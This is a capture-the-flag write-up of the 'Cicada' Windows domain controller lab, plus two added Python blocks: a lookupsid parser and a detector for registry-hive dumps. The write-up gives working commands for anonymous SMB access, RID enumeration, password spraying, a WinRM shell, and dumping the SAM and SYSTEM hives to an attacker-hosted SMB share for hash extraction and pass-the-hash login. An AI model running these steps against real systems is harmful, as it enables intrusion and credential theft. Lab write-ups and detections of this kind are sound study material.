Enumeration
NMAP
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-23 15:13:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
51702/tcp open msrpc Microsoft Windows RPC
SMB
Anonymous login to the share /HR is possible.
To view the file, it's better to download it.
mget *
The file contains a password for a user, but the user is not known.
A search for usernames elsewhere in the infrastructure turned up nothing, so user accounts are enumerated instead by brute-forcing RIDs with Impacket's lookupsid.
/usr/bin/impacket-lookupsid [email protected]
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Brute forcing SIDs at 10.10.11.35
[*] StringBinding ncacn_np:10.10.11.35[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)
The following accounts can be found (note that Dev Support, RID 1109, is reported as SidTypeGroup, so it is a group rather than a user):
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
Dev Support
emily.oscars
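Rather than picking the names out of the RID list by eye, the lookupsid output can be parsed. This added script is not part of the original writeup; it separates user accounts from groups and machine accounts, which is also the view an administrator wants when checking what anonymous SID enumeration exposes. The sample input is a constructed excerpt of the output shown above.

```python
import re

# Constructed sample: a few lines in the exact format impacket-lookupsid prints,
# taken from the enumeration above (the full listing is on the page).
SAMPLE_OUTPUT = """\
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
500: CICADA\\Administrator (SidTypeUser)
501: CICADA\\Guest (SidTypeUser)
513: CICADA\\Domain Users (SidTypeGroup)
1000: CICADA\\CICADA-DC$ (SidTypeUser)
1104: CICADA\\john.smoulder (SidTypeUser)
1109: CICADA\\Dev Support (SidTypeGroup)
1601: CICADA\\emily.oscars (SidTypeUser)
"""

# "<rid>: <DOMAIN>\<name> (<SidType...>)"
LINE_RE = re.compile(
    r"^(?P<rid>\d+): (?P<domain>[^\\]+)\\(?P<name>.+?) \((?P<kind>SidType\w+)\)$"
)

def parse_lookupsid(text):
    """Return (domain_sid, entries); each entry is a dict with rid, domain, name, kind."""
    domain_sid = None
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[*] Domain SID is: "):
            domain_sid = line.split(": ", 1)[1]
            continue
        m = LINE_RE.match(line)
        if m:
            entries.append({"rid": int(m["rid"]), "domain": m["domain"],
                            "name": m["name"], "kind": m["kind"]})
    return domain_sid, entries

def user_accounts(entries, min_rid=1000):
    """Human user accounts: SidTypeUser, RID >= min_rid (built-ins are below 1000),
    and not a machine account (names ending in '$')."""
    return [e["name"] for e in entries
            if e["kind"] == "SidTypeUser" and e["rid"] >= min_rid
            and not e["name"].endswith("$")]

def groups(entries):
    """Groups and aliases, so they are not mistaken for user accounts."""
    return [e["name"] for e in entries if e["kind"] in ("SidTypeGroup", "SidTypeAlias")]
```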
CrackMapExec can be used to check which user the password belongs to.
crackmapexec smb 10.10.11.35 -u users.txt -p passwords.txt
With a valid user and password, other domain users and their attributes can now be enumerated. This quickly turns up a user who apparently forgot their password and was issued a new one.
crackmapexec smb 10.10.11.35 -u users.txt -p passwords.txt --users
With the two users and passwords, an attempt can now be made to access the DEV share.
On the share, there is a backup script that contains a username along with a clear-text password. It also specifies which directory this user is allowed to access.
Now an attempt can be made to gain a foothold on the system. In this case, I used evil-winrm to spawn a shell.
It works: a shell is obtained on the system. The user flag is in the Desktop folder. Reading the administrator flag fails with access denied, so privilege escalation to a higher-privileged user is required.
whoami /priv
This shows the current user's privileges. As it turns out, the user holds SeBackupPrivilege, which allows reading any file on the system regardless of its ACL. The registry hives can therefore be saved, and the hashes either cracked locally on the workstation or used directly to log in.
reg.exe save hklm\sam C:\tmp\sam.save
reg.exe save hklm\system C:\tmp\system.save
On the attack box, host an SMB share and copy files from the Windows machine.
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support SHARENAME SHAREPATH
move sam.save \\10.10.14.16\smb
move system.save \\10.10.14.16\smb
With Impacket, the hashes can then be extracted.
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -system system.save LOCAL
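From the defender's side, the whole chain above (reg save of SAM and SYSTEM, then the hive files moved to a remote share) is visible in process-creation telemetry. This added detection is not part of the writeup; it runs over constructed records shaped like Sysmon Event ID 1 fields (User, CommandLine), flags hive saves and hive-file transfers to UNC paths, and raises severity once a user has saved SYSTEM together with SAM or SECURITY, the pair secretsdump needs.

```python
import re

# Constructed sample records in the shape of Sysmon Event ID 1 (process creation).
# They are made up for this example, not logs taken from the machine.
EVENTS = [
    {"User": "CICADA\\emily.oscars", "CommandLine": "whoami /priv"},
    {"User": "CICADA\\emily.oscars", "CommandLine": "reg.exe save hklm\\sam C:\\tmp\\sam.save"},
    {"User": "CICADA\\emily.oscars", "CommandLine": "reg.exe save hklm\\system C:\\tmp\\system.save"},
    {"User": "NT AUTHORITY\\SYSTEM", "CommandLine": "reg.exe query HKLM\\SOFTWARE\\Microsoft"},
    {"User": "CICADA\\emily.oscars", "CommandLine": "cmd.exe /c move sam.save \\\\10.10.14.16\\smb"},
    {"User": "CICADA\\svc_backup", "CommandLine": "reg.exe save hklm\\software C:\\tmp\\soft.save"},
]

# reg save of a credential-bearing hive: SAM (local hashes), SYSTEM (boot key
# needed to decrypt them), SECURITY (LSA secrets, cached domain credentials).
HIVE_DUMP_RE = re.compile(r'\breg(?:\.exe)?\s+save\s+"?hklm\\(sam|system|security)\b', re.IGNORECASE)
# A saved hive file being moved or copied to a UNC path (\\host\share).
HIVE_EXFIL_RE = re.compile(r'\b(?:move|copy|xcopy|robocopy)\b.*\b(sam|system|security)\.save\b.*\\\\\S+',
                           re.IGNORECASE)

def classify(command_line):
    """Return ('dump', HIVE), ('exfil', HIVE) or None for one command line."""
    m = HIVE_DUMP_RE.search(command_line)
    if m:
        return ("dump", m.group(1).upper())
    m = HIVE_EXFIL_RE.search(command_line)
    if m:
        return ("exfil", m.group(1).upper())
    return None

def detect(events):
    """Aggregate hits per user. Severity is 'high' once SYSTEM has been saved
    together with SAM or SECURITY, otherwise 'medium'."""
    per_user = {}
    for ev in events:
        hit = classify(ev["CommandLine"])
        if hit is None:
            continue
        state = per_user.setdefault(ev["User"], {"dumped": set(), "exfiltrated": set()})
        state["dumped" if hit[0] == "dump" else "exfiltrated"].add(hit[1])
    alerts = {}
    for user, state in per_user.items():
        d = state["dumped"]
        high = "SYSTEM" in d and ("SAM" in d or "SECURITY" in d)
        alerts[user] = {"dumped": sorted(d), "exfiltrated": sorted(state["exfiltrated"]),
                        "severity": "high" if high else "medium"}
    return alerts
```

Saving HKLM\SOFTWARE or querying a key does not match, which keeps ordinary administrative use of reg.exe out of the alert; in a real deployment the same logic would also be correlated with Security Event 4672 showing SeBackupPrivilege for the logon.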
The login with the hash works perfectly!
The root flag can be found on the Desktop.